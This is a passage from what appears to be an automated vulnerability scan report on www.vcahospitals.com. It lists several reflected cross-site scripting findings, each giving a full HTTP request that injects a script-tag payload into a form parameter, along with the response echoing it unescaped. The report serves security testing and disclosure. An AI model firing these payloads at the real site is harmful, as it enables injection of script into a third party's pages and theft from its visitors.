<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FLf0508"><script>alert(1)</script>c935fdcf07e&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.21. http://www.vcahospitals.com/main/offer [addr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e30"><script>alert(1)</script>0f7c5167de6 was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=d4e30"><script>alert(1)</script>0f7c5167de6&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ceoonhufna4nqjnbadvlk4olp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=d4e30"><script>alert(1)</script>0f7c5167de6&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&sub
...[SNIP]...

2.22. http://www.vcahospitals.com/main/offer [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5398c"><script>alert(1)</script>87df2a8d4cb was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7lu4jl5rh2o7n9k5h17md6nq97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Ge
...[SNIP]...

2.23. http://www.vcahospitals.com/main/offer [date parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5640a"><script>alert(1)</script>ae7e41b90f2 was submitted in the date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ggd6ft9v06ns03acajkmsv7l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&to
...[SNIP]...

2.24. http://www.vcahospitals.com/main/offer [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 301c8"><script>alert(1)</script>a34d170cc15 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=70e0blfdjoh05e8704s1uokj93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa1
...[SNIP]...

2.25. http://www.vcahospitals.com/main/offer [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92a"><script>alert(1)</script>7d4cd1323ce was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
